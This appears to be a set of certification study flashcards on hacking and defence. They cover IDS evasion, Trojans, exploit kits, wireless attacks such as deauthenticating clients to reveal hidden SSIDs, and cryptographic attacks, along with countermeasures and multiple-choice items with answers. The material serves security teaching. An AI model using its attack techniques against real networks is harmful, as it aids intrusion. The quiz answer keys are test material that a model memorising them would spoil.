This refers to the configuration weaknesses in web infrastructure that can be exploited to launch various attacks on web servers such as directory traversal, server intrusion, and data theft - Verbose Debug/Error Messages - Anonymous or Default Users/Passwords - Sample Configuration and Script Files - Remote Administration Functions - Unnecessary Services Enabled - Misconfigured/Default SSL Certificates
Website Defacement
This refers to the unauthorized changes made to the content of a single web page or an entire website, resulting in changes to the visual appearance of the website or a web page. -Hackers injecting code to add images, popups, or text to a page -Attacker may replace the entire website instead of just changing single pages. -Attackers use MySQL injection to access a website in order to do this
Application-level flood attacks
This result in the loss of services of a particular network, such as emails, network resources, temporary ceasing of applications and services, and so on. This attack can result in substantial loss of money, service, and reputation for organizations These attacks occur after the establishment of a connection. Because the connection is established and the traffic entering the target appears to be legitimate, it is difficult to detect these attacks. However, if the user identifies the attack, he or she can stop it and trace it back to a specific source more easily than other types of DDoS attacks Attackers attempt to: -o Flood web applications to legitimate user traffic -o Disrupt service to a specific system or person, for example, blocking a user's access by repeating invalid login attempts -o Jam the application database connection by crafting malicious SQL queries
Network Address Translation (NAT)
This separates IP addresses into two sets and enabling the LAN to use these addresses for internal and external traffic, respectively. ThisT helps hide an internal network layout and force connections to go through a choke point It can act as a firewall filtering technique where it allows only those connections which originate on the inside network and will block the connections which originate on the outside network. NAT systems use different schemes for translating between internal and external addresses:
Web Proxy
This sits in between the web client and web server. Due to the placement, all the requests from the clients will be passed on to the web server through this. They are used to prevent IP blocking and maintain anonymity.
Human-based Social Engineering
This social engineering involves human interaction. On the pretext of a legitimate person, the attacker interacts with the employee of a target organization to collect sensitive information about the organization such as business plans, network, etc. that might help him/her in launching an attack.
Network-based Intrysion Detection System (NIDS)
This systems check every packet entering the network for the presence of anomalies and incorrect data. By limiting the firewall to drop large numbers of data packets, the NIDS checks every packet thoroughly. It audits the information contained in the data packets, logging information of malicious packets, and assigns a threat level to each risk after receiving the data packets. These mechanisms typically consist of a black box placed on the network in promiscuous mode, listening for patterns indicative of an intrusion. It detects malicious activity such as Denial-of-Service attacks, port scans, or even attempts to crack into computers by monitoring network traffic.
Evasion Technique: String Concatenation
This technique breaks a single string into a number of pieces and concatenates them at the SQL level. attacker uses concatenation to break-up identifiable keywords to evade intrusion detection systems
Spread Spectrum Steganography
This technique is less susceptible to interception and jamming. communication signals occupy more bandwidth than required to send the information
Spearphishing Sites:
This technique is used for mimicking legitimate institutions, such as banks, in an attempt to steal passwords, credit card and bank account data, and other sensitive information.
Topological scanning technique
This technique uses the information obtained from the infected machine to find new vulnerable machines. An infected host checks for URLs in the disk of a machine that it wants to infect. Then it shortlists the URLs, targets, and checks their vulnerability. This technique yields accurate results, and the performance is similar to the hit-list scanning technique
Statistical Techniques Steganography
This technique utilizes the existence of "1-bit" steganography schemes by modifying the cover in such a way that, when transmission of a "1" occurs, some of the statistical characteristics change significantly. In other cases, the cover remains unchanged, to distinguish between the modified and unmodified covers.
Acunetix Web Vulnerability Scanner
This tool checks web applications for SQL injections, cross-site scripting, etc. It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer. Port scans a web server and runs security checks against network services. Tests web forms and password-protected areas. It includes an automatic client script analyzer allowing for security testing of Ajax and Web 2.0 apps.
CookieDigger
This tool helps identify weak cookie generation and insecure implementations of session management by web applications. It works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values
RioT Vulnerability scanner
This tool identify at-risk IoT devices, such as IP cameras, DVRs, printers, routers, etc. This tool gives you an attacker's view of all the IoT devices and their associated vulnerabilities. Utilizing precise information such as server banner and header data, it will pinpoint the make and model of a particular IoT device.
Watcher Web Security Tool
This tool is a plugin for the Fiddler HTTP proxy that passively audits a web application to find security bugs and compliance issues automatically. It acts as an assistant to the developer or pen-tester by quickly identifying issues that commonly lead to security problems in web apps. Integrate it into your test passes to achieve more coverage of security testing goals
ZoneAlarm & Firewall Analyzer Firewalls
This tool prevents identity theft by guarding your data. It even erases your tracks allowing you to surf the web in complete privacy. Fit locks out attackers, blocks intrusions, and makes your PC invisible online. Also, it filters out an annoying and potentially dangerous email This tool is an agent-less log analytics and configuration management software that helps network administrators to understand how bandwidth is being used in their network. Firewall Analyzer is vendor-agnostic and supports almost all open source and commercial network firewalls such as Check Point, Cisco, Juniper, Fortinet, Palo Alto, etc.
ServerMask
This tool removes unnecessary HTTP header and response data, and camouflages the server by providing false signatures. It also lets you eliminate file extensions (such as .asp or .aspx) and it clearly indicates that a site is running on a Microsoft server. Countermeasure for banner grabbing.
IoT models : Back-end Data-Shareing
This type of communication model extends the device-to-cloud communication type in which the data from the IoT devices can be accessed by authorized third parties. Here devices upload their data onto the cloud which is later accessed or analyzed by the third parties
Detecting presence of Sebek-based Honeypots
This type of honeypots record all the data that is accessed via reading () call. Attackers can detect the existence of Sebek based honeypots by analyzing the congestion in the network layer since Sebek data communication will be mostly unencrypted. Since Sebek logs everything that is accessed via reading () call before transferring to the network, it causes the congestion effect.
Computer-based Social Engineering
This type of social engineering relies on computers and Internet systems to carry out the targeted action.
Open Source Web Server Architecture
This typically uses Linux, Apache, MySQL, and PHP (LAMP) as principal components. -Linux is the server's OS that provides secure platform for the web server -Apache is the web server component that handles each HTTP request and response -MySQL is a relational database used to store the web server's content and configuration information -PHP is the application layer technology used to generate dynamic web content
Wireless Pen Testing
Threat Assessment: Identify the wireless threats facing an organization's information assets. Upgrading Infrastructure: Change or upgrade existing infrastructure of software, hardware, or network design. Risk Prevention and Response: Provide comprehensive approach of preparation steps that can be taken to prevent inevitable exploitation. Security Control Auditing: To test and validate the efficiency of wireless security protections and controls. Data Theft Detection: Find streams of sensitive data by sniffing the traffic Information System Management: Collect information on security protocols, network strength, and connected devices
E-Banking Trojans
Threat to online banking Intercept a victim's account information before it is encrypted and sends it to the attacker's Trojan command and control center Attackers program these Trojans to steal minimum and maximum monetary amounts, so that they do not withdraw all the money in the account, which serves to avoid suspicion. These Trojans also create screenshots of the bank account statement, so that the victim thinks that there is no variation in bank balance and is not aware of this fraud unless checks the balance from another system or an ATM. It steals victim's data such as credit related card no, CVV2 billing details and transmits it to remote hackers using emails, FTP, IRC, or other methods
Hit-List Scanning technique
Through scanning an attacker first collects a list of potentially vulnerable machines and then creates a zombie army. Then the attacker performs scanning down the list to find a vulnerable machine. On finding one, the attacker installs a malicious code on it and divides the list in half In one half, the attacker continues to scan; the other half is given to the newly compromised machine to find the vulnerable machine in its list and continue the same process as discussed before. This goes on simultaneously from an everlasting increasing number of compromised machines. This technique ensures installation of malicious code on all the potential vulnerable machines in the hit list within a short time.
Server ID/Banner Grabbing
Through this, attackers identify the name and/or version of a server, operating system, or application. Telnet Netcat ID Serve Netcraft
Ending processes can stop a service, using a logic bomb or time bomb, or even reconfiguring and crashing the system.
Thus attackers can exhaust system and network resources by consuming all outgoing communication links.
URG Flag
When the user sets the urgency flag, TCP protocol ignores all data before the urgency pointer, and the data to which the urgency pointer points is processed. . Some IDSes do not take into account the TCP protocol's urgency feature and process all the packets in the traffic whereas the target system process only the urgent data. Attackers exploit this feature to evade the IDS, as seen in other evasion techniques.
TippingPoint & AlienVault IDSs
TippingPoint IPS is in-line threat protection that defends critical data and applications without affecting performance and productivity. It contains over 8,700 security filters written to address zero-day and known vulnerabilities. TippingPoint IPS consists of both inbound/outbound traffic inspection, as well as application-level security capabilities. AlienVault® OSSIMTM, Open Source Security Information and Event Management (SIEM), provides you with a feature-rich open source SIEM complete with event collection, normalization, and correlation. OSSIM provides one unified platform with many of the essential security capabilitie
Server Discovery
To footprint a web infrastructure, first you need to discover active Internet servers. Three techniques—namely, whois lookup, DNS interrogation, and port scanning—help in discovering the active servers and their associated information. whois -Whois Lookup is a tool that allows you to gather information about a domain with the help of DNS and WHOIS queries. o Netcraft o SmartWhois o DNSstuff Toolbox DNS interrogation -a distributed database used to connect their IP addresses with their respective hostnames and vice-versa -It provides information about the location and type of servers. o DNSstuff Toolbox o Network-Tools.com o Dig o NsLookup Port scan -It attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server. o Nmap oNetScan o Hping o Advanced port scanner
How Attackers Deploy a Trojan
To gain control over the victim's machine, an attacker -creates a Trojan server -sends an email that lures the victim to click on a link provided within the mail. -As soon as the victim clicks the malicious link sent by the attacker, it connects directly to the Trojan server. -The Trojan server then sends a Trojan to the victim system that undergoes automatic installation on the victim's machine and infect it. -As a result, the victim's device establishes a connection to the attack server unknowingly. -Once the victim connects to an attacker's server, the attacker can take complete control over the victim's system and perform any selective action
Adaptive Chosen plaintext attack
To perform this attack, an attacker needs to interact with the encryption device. In this type of attack, an attacker has a complete access to the plaintext message including its encryption, and he/she can also modify the content of the message by making series of interactive queries, choosing subsequent plaintext blocks based on the information from the previous encryption queries and functions.
Chosen-ciphertext Attack
To perform this attack, the attacker must have access to communication channel between the sender and the receiver Attacker obtains the plaintexts corresponding to an arbitrary set of ciphertexts of his own choosing. Using this information, the attacker tries to recover the key used to encrypt the plaintext. There are two variants of this attack: o Lunchtime or Midnight Attack: In this attack, the attacker can have access to the system for only a limited amount of time or can access only few plaintext-ciphertext pairs. o Adaptive Chose-ciphertext Attack: In this attack, the attacker selects a series of cipertexts and then observes the resulting plaintext blocks.
RIG Exploit Kit
Used successfully by attackers in distributing Cryptobit, CryptoLuck, CryptoShield, CryptoDefense, Sage, Spora, Revenge, PyCL, Matrix, Philadelphia, and princess Ransomwares. RIG EK was also involved in distributing LatentBot, Pony and Ramnit Trojans. RIG was also involved in delivering the famous banking Trojan ZeuS Features: -o RIG EK landing page is performed via a standard 302 Redirect -o Domain auto-rotator to avoid blacklisting and detection -o FUD (entirely undetectable) exploits -o Combines different web technologies, such as DoSWF, JavaScript, Flash and VBScript to obfuscate the attack
Trojan/Spyware/Keylogger
Used to collect victims usernames and passwords. Runs in background -A Trojan is a program that masks itself as a benign application. The software initially appears to perform a desirable or benign function but instead steals information or harms the system. -Spyware is a type of malware that attackers install on a computer to secretly gather information about its users without their knowledge. Spyware hides itself from the user and can be difficult to detect. -A keylogger is a program that records all user keystrokes without the user's knowledge. Keyloggers ship the log of user keystrokes to an attacker machine or hide it in the victim's machine for later retrieval
Jailbreaking - Bootrom Exploit
Uses a loophole in the SecureROM (iDevice's first bootloader) to disable signature checks, which can be used to load patch NOR firmware. Firmware updates cannot patch these types of exploits. A bootrom jailbreak allows user-level access and iboot-level access. Only a hardware update of bootrom by Apple can patch this exploit.
Advanced Google Hacking Techniques
Uses advanced search operators to find sensitive or hidden information pointing to vulnerabilities[cache:], [link:], [info:], [site:], [intitle:], [inurl:] and more, including Google Advanced Image Search
Parabolic Grid Antenna
Uses the same principle as a satellite dish but it does not have a solid backing. It consists of a semi-dish that is in the form of a grid made of aluminum wire. -can achieve very long-distance Wi-Fi transmissions by making use of a highly focused radio beam. - This type of antenna is useful for transmitting weak radio signals over very long distances—on the order of 10 miles.
Cover Medium - Audio Stego
Using LSB or inaudible frequencies (echo data hiding, spread spectrum, tone insertion, phase encoding etc). Tools- BitCrypt, SilentEye, CHAOS, StegoStick etc
Source Routing
Using this technique, the sender of the packet designates the route (partially or entirely) that a packet should take through the network, in such a way that the designated route should bypass the firewall node. It takes two approaches: loose source routing, and strict source routing. In loose source routing, the sender specifies one or more stages the packet must go through, whereas, in strict source routing, the sender specifies the exact route the packet must go through.
Dynamic Malware Analysis - Installation Monitoring
When the system or users install or uninstall any software application, there is a chance that it leaves traces of the application data on the system This will help in detecting hidden and background installations which the malware performs Tool - Mirekusoft Install Monitor for monitoring installation of malicious executable
Absorbing the attack
Volume-based DDoS attack with at least 1 000 000 bots sending the traffic from the entire globe can be counter how?
Attack Area : Cloud Web Interface
Vulnerability present it this competent are Transport Encryption, SQL Injection, Cross-site Scripting and Cross-site Request Forgery, Username Enumeration and Known Default Credentials, Weak Passwords and Account Lockout , Insecure password recovery mechanism and Two-factor authentication
Attack Area : Local Data Storage
Vulnerability present it this competent are Unencrypted Data , Data Encrypted with Discovered Keys and Lack of Data Integrity Checks
Attack Area : Third-party Backend APIs
Vulnerability present it this competent are Unencrypted PII Sent, Device Information Leaked and Location Leaked
Attack Area : Update Mechanism
Vulnerability present it this competent are Update Sent without Encryption, Updates Not Signed, Update Verification, Malicious Update, Missing Update Mechanism and No Manual Update Mechanism
NTFS Data Stream
Windows hidden stream contains metadata for files. ADS = seamlessly forking metadata into existing files. Allows attacker to inject mal code and execute without detection.
WEP vs WPA vs WPA2
WEP -provided data confidentiality on wireless networks, -weak and failed to meet any of its security goals. -replaced with either WPA or WPA2 -encryption RC4, IV 24-bits, Key Length 40/104-bits, Integrity check CRC-32 WPA -fixes most of WEP's problems. -protections against forgery and replay attacks. - encryption RC4, TKIP, IV 48-bits, Key Length 128-bits, Integrity check Michael algorithm and CRC-32 WPA2 -makes wireless networks almost as secure as wired networks -supports authentication -protections against forgery and replay attacks. - encryption AES-CCMP, IV 48-bits, Key Length 128-bits, Integrity check CBC-MAC
Temporal Key Integrity Protocol (TKIP)
WPA encryption Used in a unicast encryption key, which changes the key for every packet, thereby enhancing the security. Uses a Michael Integrity Check algorithm with a message integrity check key to generate the MIC value. Client starts with a 128-bit "temporal key" (TK) that is then combined with the client's MAC address and with an IV to create a keystream that is used to encrypt data via the RC4. keys are changed for every 10,000 packets
Web Server Attack Tools
Wfetch -a IIS Server Resource Kit tool that allows attacker to fully customize an HTTP request and send it to a web server to see the raw HTTP request and response data. -It allows attacker to test the performance of websites that contain new elements such as Active Server Pages (ASP) or wireless protocols THC Hydra Hulk DoS MPack w3af
Multipartite Viruses
When the virus infects the boot sector, it will, in turn, affect the system's file and vice versa. This type of virus re-infects a system repeatedly if the virus is not rooted out entirely from the target machine. Infect the system boot sector and the executable files at the same time Some of the examples of multipartite viruses include invade, flip, and tequila
Reset alias "RST"
When there is an error in the current connection, its flag is set to "1," and it aborts the connection in response to the error.
Web Spider politeness
Whether or not the spider pays attention to the robots.txt file that protects vulnerable parts of websites from crashing due to high load
Obfuscation
Which evasion technique is used by attackers to encode the attack packet payload in such a way that the destination host can only decode the packet but not the IDS? -Fragmentation Attack -Session splicing -Obfuscation -Unicode Evasion
Local forwards
Which feature of Secure Pipes tool open application communication ports to remote servers without opening those ports to public networks? Remote forwards SOCKS proxies Local forwards Remote backwards
Send-Safe Honeypot Hunter
Which honeypot detection tools has following features: -Checks lists of HTTPS, SOCKS4, and SOCKS5 proxies with any ports -Checks several remote or local proxylists at once Can upload "Valid proxies" and "All except honeypots" files to FTP -Can process proxylists automatically every specified period -May be used for usual proxylist validating as well Send-Safe Honeypot Hunter WAN Killer WireEdit Ostinato
Firewalking
Which method of firewall identification has the following characteristics: -uses TTL values to determine gateway ACL filters -maps networks by analyzing IP packet response -probes ACLs on packet filtering routers/firewalls using the same method as trace-routing -sends TCP or UDP packets into the firewall with TTL value is one hop greater than the targeted firewall Port Scanning Banner Grabbing Firewalking Source Routing
Session splicing
Which network-level evasion method is used to bypass IDS where an attacker splits the attack traffic in too many packets so that no single packet triggers the IDS? -Fragmentation attack -Overlapping fragments -Unicode evasion -Session splicing
ZoneAlarm PRO FIREWALL 2018
Which of the following firewall solution tool has the following features: ● Two-way firewall that monitors and blocks inbound as well as outbound traffic ● Allows users to browse the web privately ● Identity protection services help to prevent identity theft by guarding crucial data of the users. It also offers PC protection and data encryption ● Through Do Not Track, it stops data-collecting companies from tracking the online users ● Online Backup to backs up files and restores the data in the event of loss, theft, accidental deletion or disk failure -ZoneAlarm PRO FIREWALL 2018 -Vangaurd Enforcer -zIPS -Wifi Inspector
NetPatch firewall
Which of the following firewalls is used to secure mobile device? -Comodo firewall -NetPatch firewall -Glasswire -TinyWall
Repeated probes of the available services on your machines
Which of the following indicator identifies a network intrusion? - Rare login attempts from remote hosts - Connection requests from IPs from those systems within the network range - Repeated probes of the available services on your machines - Sudden decrease in bandwidth consumption is an indication of intrusion
Signature Recognition
Which of the following intrusion detection technique involves first creating models of possible intrusions and then comparing these models with incoming events to make a detection decision? -Signature Recognition -Anomaly Detection -Protocol Anomaly Detection -Obfuscating
IP address spoofing
Which of the following is a hijacking technique where an attacker masquerades as a trusted host to conceal his identity, hijack browsers or websites, or gain unauthorized access to a network? -Port-scanning -IP address spoofing -Firewalking -Source routing
Super network tunnel
Which of the following is a two-way HTTP tunneling software tool that allows HTTP, HTTPS, and SOCKS tunneling of any TCP communication between any client-server systems? -Bitvise -Loki -Super network tunnel -Secure Pipes
Integrity Checking Hashes
Which of the following techniques will identify if computer files have been changed? -Firewall alerts -Integrity checking hashes -Network sniffing -Permission sets
Loki
Which of the following tools is used to execute commands of choice by tunneling them inside the payload of ICMP echo packets if ICMP is allowed through a firewall? -AckCmd -HTTPTunnel -Anonymizer -Loki
Computers establish a connection with a proxy firewall that initiates a new network connection for the client.
Which of the statements concerning proxy firewalls is correct? -Computers establish a connection with a proxy firewall that initiates a new network connection for the client. -Proxy firewalls block network packets from passing to and from a protected network. -Firewall proxy servers decentralize all activity for an application. -Proxy firewalls increase the speed and functionality of a network.
UDP 514
Which protocol and port number might be needed to send log messages to a log analysis tool that resides behind a firewall? -UDP 541 -UDP 123 -UDP 415 -UDP 514
Anonymizer Tools
Whonix -desktop operating system designed for advanced security and privacy -TunnelBeear -Invisible Internet -JonDo -Proxify -Psiphon -Anonymizer Universal -Ultrasurf
Hotspot Finders
Wi-Fi Finder an android mobile application that can be used for finding free or paid public Wi-Fi hotspots online or offline. Features: o Scan for Wi-Fi hotspots around you o Search for public Wi-Fi anywhere in the world o View Wi-Fi hotspot detail, call location, get directions or share the hotspot o Filter results by location (cafe, hotel, etc.) or provider type o Works both online and offline -Homedale::Wi-Fi/WLAN Monitor -Avast Wi-Fi Finder -Open WiFi Finder -Free WiFi Finder - Fing - Network Tools
Dynamic Malware Analysis - Event Logs Monitoring/Analysis
a process of analyzing computer-generated records or activities to identify malicious or suspicious events Tools - Loggly to identify suspicious logs or events with malicious intent
AirPcap
Wi-Fi USB dongle captures full 802.11 data, management, and control frames that can be viewed in Wireshark, -provides in-depth protocol dissection and analysis capabilities. -can operate in a completely passive mode Features: o It provides capability for simultaneous multi-channel capture and traffic aggregation o It can be used for traffic injection that help in assessing the security of a wireless network o Supported in Aircrack-ng, Cain & Able, and Wireshark tools o AirPcapReplay, included in Software Distribution, replays 802.11 network traffic that is contained in a trace file
Access Control Attack: Ad Hoc Connection
Wi-Fi clients communicate directly through this and it does not require an AP to relay packets. Networks in this mode can conveniently share information among clients. An attacker may carry out this kind of attack by using any USB adapter or wireless card. The attacker connects the host is to an unsecured client to attack a specific client or to avoid AP security.
Mobile Sniffing Tools
Wi.cap -This tool is a mobile network packet sniffer for ROOT ARM droids. It works on the rooted Android mobile devices. FaceNiff -Android app that can sniff and intercept web session profiles over the Wi-Fi connected to the mobile. This app works on rooted android devices. -The Wi-Fi connection should be over Open, WEP, WPA-PSK, or WPA2-PSK networks while sniffing the sessions. Packet Capture -a network traffic sniffer app with SSL decryption. It is a powerful debugging tool, especially when developing an app
Mobile Discovery Tools
WifiExplorer WiFi Manager OpenSignalMaps Network Signal Info Pro WiFiFoFum WiFinder
Sniffing Tools
WireShark SteelCentral Packet Analyzer -This tool comes integrated with Riverbed AirPcap adapters to analyze and troubleshoot 802.11 wireless networks. Capsa Network Analyzer -It is also able to perform reliable network forensics, advanced protocol analyzing, in-depth packet decoding, and automatic expert diagnosing. It helps you to detect network vulnerabilities OmniPeek -Real-time visibility and expert analysis of each part of the target network -It displays a Google map in the OmniPeek capture window that shows the locations of all the public IP addresses of captured packets Observer Analyzer -monitors unified communications (UC) deployments, network performance, applications, and troubleshooting on complex networks including VM environments.
Elcomsoft Wireless Security Auditor
Wireless Hacking Tool allows attackers to break into a secured Wi-Fi network by sniffing wireless traffic and running an attack on the network's WPA/WPA2-PSK password. It helps administrators verify how secure a company's wireless network is. It examines the security of your wireless network by attempting to break into the network from outside or inside. It can work as a wireless sniffer or operate offline by analyzing a dump of network communications. The tool attempts to retrieve the original WPA/WPA2-PSK passwords in plain text.
Wi-Fi Packet Sniffer
Wireshark w/ AirPcap SteelCentral OmniPeek CommView
USB Spyware
a program designed for spying on the computer that copies spyware files from a USB device onto the hard disk without any request and notification.
Access Control
a method for reducing the risk of data from being affected and to save the organization's crucial data by providing limited access of computer resources to users. Terminologies -Subject - user or process -Object - resource -Refrence monitor - moitors restrictions - Operations - actions performed by subject
Colasoft Packet Builder
a tool that allows an attacker to create custom network packets and helps security professionals to assess the network. supports saving packets to packet files and sending packets to the network This packet builder audits networks and checks network protection against attacks and intruders. Three views in the Packet Builder -The Packet List displays all constructed packets. -In the Hex Editor, the data of the packet are represented as hexadecimal values and ASCII characters; nonprintable characters are represented by a dot (".") -Decode editor - edit packets w/o remembering value length, byte order, and offsets
Downloader
a type of Trojan that downloads other malware from the internet on to the PC. Usually, attackers install this software when they first gain access to a system
Non-Repudiation
a way to guarantee that the sender of a message cannot later deny having sent the message
Reveal Hidden SSID
airmon-ng + airodump + Aireplay-ng Step 1: Run airmon-ng in monitor mode Step 2: Start airodump to discover SSIDs on interface Step 3: De-authenticate (deauth) the client to reveal hidden SSID using Aireplay-ng Step 4: Switch to airodump to see the revealed SSID
Sniffing Internet Message Access Protocol (IMAP)(143)
allows a client to access and manipulate electronic mail messages on a server. This protocol offers inadequate security, which allows attackers to obtain data and user credentials in clear text.
Overwriting File or Cavity Viruses
also space filler virus which overwrites a part of the host file with a constant without increasing the length of the file and preserving its functionality. Maintaining constant file size when infecting allows it to avoid detection. The cavity viruses are rarely found due to the unavailability of hosts and due to the code complexity in writing. most popular virus family in this category is the CIH virus (known as Chernobyl or Spacefiller
Active wiretapping
an MITM attack that allows an attacker to monitor, record the traffic or data flow and alter or inject data in a communication system.
Security Zoning
an area within a network that consists of a group of systems and other components with the same characteristics, all of which serve to manage a secure network environment -The network security zoning mechanism allows an organization to efficiently manage a secure network environment by selecting the appropriate level of security for different zones of Internet and intranet networks.
Advanced Persistent Threats (APT)
an attack that focuses on stealing information from the victim machine without its user being aware of it. -exploit vulnerabilities in the applications running on a computer, operating system, and embedded systems.
DHCP Starvation Attack
an attacker floods the DHCP server by sending a large number of DHCP requests and uses all of the available IP addresses that the DHCP server can issue. As a result, the server cannot issue any more IP addresses, leading to Denial-of-Service (DoS) attacks. Because of this issue, valid users cannot obtain or renew their IP addresses, and thus fail to access their network. An attacker broadcasts DHCP requests with spoofed MAC addresses with the help of tools such as Gobbler
Self-Signed Certificates
an identity certificate signed by the same entity whose identity it certifies they are widely used for testing servers
Internet Worm Maker Thing
an open source tool used to create worms that can infect victim's drives, files, show messages, disable anti-virus software, etc. This tool comes along with a compiler by which you can easily convert your batch virus into executable to evade anti-virus or any other purpose. include: Batch Worm Generator C++ Worm Generator
Anti-Spyware
applications available in the market, which scan your system and check for spyware such as malware, Trojans, dialers, worms, keyloggers, and rootkits, and remove them if found. Anti-spyware provides real-time protection by scanning your system at regular intervals, either weekly or daily. It scans to ensure the computer is free from malicious software o SUPERAntiSpyware -Detect and Remove Spyware,Repair broken Internet Connections, Desktops, Registry Editing and more with our unique Repair System o Kaspersky Internet Security 2018 o SecureAnywhere Internet Security Complete
Retina CS
content-aware vuln assessment & risk analysis. A vulnerability management software solution designed to provide organizations with context-aware vulnerability assessment and risk analysis.
Cross View-Based Detection
function by assuming the operating system has been subverted in some way. This enumerates the system files, processes, and registry keys by calling common APIs The tools compare the gathered information with the data set obtained through the use of an algorithm traversing through the same data
how can you get internal IP addresses by querying the NTP server?
if the NTP server is in the DMZ
Active Reconnaissance
involve direct interactions with the target system by using tools to detect open ports, accessible hosts, router locations, network mapping, details of operating systems, and applications
Social engineering
is an attack that exploits human nature by convincing someone to reveal information or perform an activity. There are three forms
How to Defend Against Cryptographic Attacks
o Access of cryptographic keys should be given to the application or to the user directly. o Intrusion detection system should be deployed to monitor exchanging and access of keys. o Passphrases and passwords must be used to encrypt the key, if stored in disk. o Keys should not be present inside the source code or binaries. o For certificate signing, transfer of private keys should not be allowed. o For symmetric algorithms, key size of 168 bits or 256 bits should be preferred for a secure system, especially in case of large transactions. o Message authentication must be implemented for encryption of protocols. symmetric-key o For asymmetric algorithms, key size of 1536 bits and 2048 bits should be considered for secure and highly protected application. o In case of hash algorithm, key size of 168 or 256-bit should be considered. o Only recommended tools or products should be preferred rather than creating self-engineered crypto algorithms or functions. o Put a limit on number of operations per key. o The output of the hash function should have larger bit length that makes it hard to decryp
Cryptography Tools
o Advanced Encryption Package 2017 - is file encryption software for Windows used for secure file transfer, batch file encryption, and encrypted backups o BCTextEncoder -utility software simplifies the encoding and decoding of text data. o AxCrypt o Folder Lock o CryptoExpert 8 o CertainSafe o VeraCrypt o Cryptainer LE Free Encryption Software o CryptoForge o winAES
Wi-Fi Traffic Analyzer Tools
o AirMagnet WiFi Analyzer -Wi-Fi networks traffic auditing and troubleshooting tool, which provides real-time accurate, independent and reliable Wi-Fi analysis of 802.11a/b/g/n and ac wireless networks o Capsa Network Analyzer o PRTG Network Monitor o Observer Analyzer o OmniPeek Enterpris
SQL Injection Tools for Mobile
o Andro Hackbar- is a web penetration tool built for Android where you can perform SQL injection, XSS, and LFI flaws o DroidSQLi - is the automated MySQL injection tool for Android. It allows you to test MySQL-based web application against SQL injection attacks. sqlmapchik - is a cross-platform sqlmap GUI for sqlmap tool. It is primarily aimed to be used on mobile devices.
IoT Architecture
o Application Layer o Middleware Layer o Internet Layer o Access Gateway Layer o Edge Technology Layer
Waterhole attack countermeasures
o Apply software patches regularly to remove any vulnerabilities o Monitor network traffic o Secure DNS server to prevent attackers from redirecting the site to new location o Analyze user behavior o Inspect popular websites o Use browser plug-ins that block HTTP redirects o Disable third party content such as advertising services, which track user activities
NIST Recommendations for Cloud Security
o Assess risk posed to client's data, software and infrastructure o Select appropriate deployment model according to needs o Ensure audit procedures are in place for data protection and software isolation o Renew SLAs in case security gaps found between organization's security requirements and cloud provider's standards o Establish appropriate incident detection and reporting mechanisms o Analyze what are the security objectives of organization o Enquire about who is responsible of data privacy and security issues in cloud
Access Controls Attack Methods
o Attack with different user accounts: o Attack Multistage Processes: -In a multistage process, multiple requests will be sent to the server from the client. To attack such process, each and every request to the server should be captured and tested for access controls. o Attack Static Resource -Identifies the web applications where the protected static resources are accessed by the URLs. Attempt to request these URLs directly and check whether it is providing access to unauthorized users o Attack Direct Access Methods -Web applications accept certain requests that provide direct access to server side APIs. If there are any access control weaknesses in these direct access methods, an attacker can exploit the weakness and compromise the system. o Attack Restrictions on HTTP Methods: -It is important to test different HTTP methods such as GET, POST, PUT, DELETE, TRACE, OPTIONS, etc. -Attacker modifies the HTTP methods to compromise web applications. If the web application accepts these modified requests, this can bypass access controls
XML External Entity Countermeasures
o Avoid processing XML input containing reference to external entity by weakly configured XML parser o XML unmarshaller should be configured securely o Parse the document with a securely configured parser o Configure the XML processor to use local static DTD and disable any declared DTD included in XML document o Disable DOCTYPE tag or use input validation to block input containing it
Security Policy countermeasure
o Avoid sharing a computer account. o Avoid using the same password for different accounts. o Avoid storing passwords on media or writing on a notepad or sticky note. o Avoid communicating passwords over the phone, email, or SMS. o Do not forget to lock or shut down the computer before leaving the des
Bluetooth hacking tools
o BTCrawler o BlueScan o bt_rng o Bluesnarfer o Bluetooth (JABWT) Browser o GATTack.io oBluediving o BluPhish o ubertooth o Btlejuice o Super Bluetooth Hack o CIHwBT o BH BlueJack o Bluez/I2ping
Components of Public Key Infrastructure (PKI)
o Certificate Management System: Generates, distributes, certificates o Digital Certificates: Establishes transactions credentials of a person when doing online o Validation Authority (VA): Stores certificates (with their public keys) o Certificate Authority (CA): Issues and verifies digital certificates o End User: Requests, manages, and uses certificates o Registration Authority (RA): Acts as the verifier for the certificate authority
Pen Testing LEAP Unencrypted WLAN
o Check if the SSID is visible or hidden o If SSID is visible, sniff for IP range and then check the status of MAC filtering o If MAC filtering is enabled, spoof valid MAC using tools such as Technitium MAC Address Changer (TMAC), MAC Address Changer or Change MAC Address or connect to the AP using IP within the discovered range o If SSID is hidden, then deauthenticate the client using tools such as Aireplay-ng, and CommView for WiFi, associate the client, and then follow the procedure of visible SSID
Pen Testing WEP Encrypted WLAN
o Check if the SSID is visible or hidden o If SSID is visible, sniff the traffic and then check the status of packet capturing o If the packets are captured/injected, then break the WEP key using tools such as Aircrack-ng and WEPcrack, or else sniff the traffic again o If SSID is hidden, then deauthenticate the client using tools such as Aireplay-ng and CommView for Wi-Fi, associate the client and then follow the procedure of visible SSID
Types of Identity Theft
o Child Identity Theft o Criminal Identity Theft o Financial Identity Theft o Driver's License Identity Theft o Insurance Identity Thef - closely related to medical identity theft -takes the victim's medical information in order to access his insurance for a medical treatment o Medical Identity Theft -most dangerous type of identity theft o Tax Identity Theft o Identity Cloning and Concealment o Synthetic Identity Theft -most sophisticated types of identity theft where the perpetrator obtains information from different victims to create a new identity o Social Identity Theft
How to Defend Against Wireless Attacks: Authentication
o Choose Wi-Fi Protected Access (WPA) instead of WEP. o Implement WPA2 Enterprise wherever possible. o Disable the network when not required. o Place wireless access points in a secured location. o Keep drivers on all wireless equipment updated. o Use a centralized server for authentication.
Defend Against DNS Hijacking
o Choose an ICANN accredited registrar and encourage them to set Registrar-Lock on the domain name o Safeguard the registrant account information o Include DNS hijacking into incident response and business continuity planning o Use DNS monitoring tools/services to monitor DNS server IP address and alert Avoid downloading audio and video codecs and other downloaders from untrusted websites Install antivirus program and update it regularly
Cryptography Attacks
o Ciphertext-only Attack o Adaptive Chosen-plaintext Attack o Chosen-plaintext Attack o Related-Key Attack o Dictionary Attack o Known-plaintext Attack o Chosen-ciphertext Attack o Rubber Hose Attack o Chosen-key Attack o Timing Attack o Main-in-the-Middle Attack
Wi-Fi Security Auditing Tools
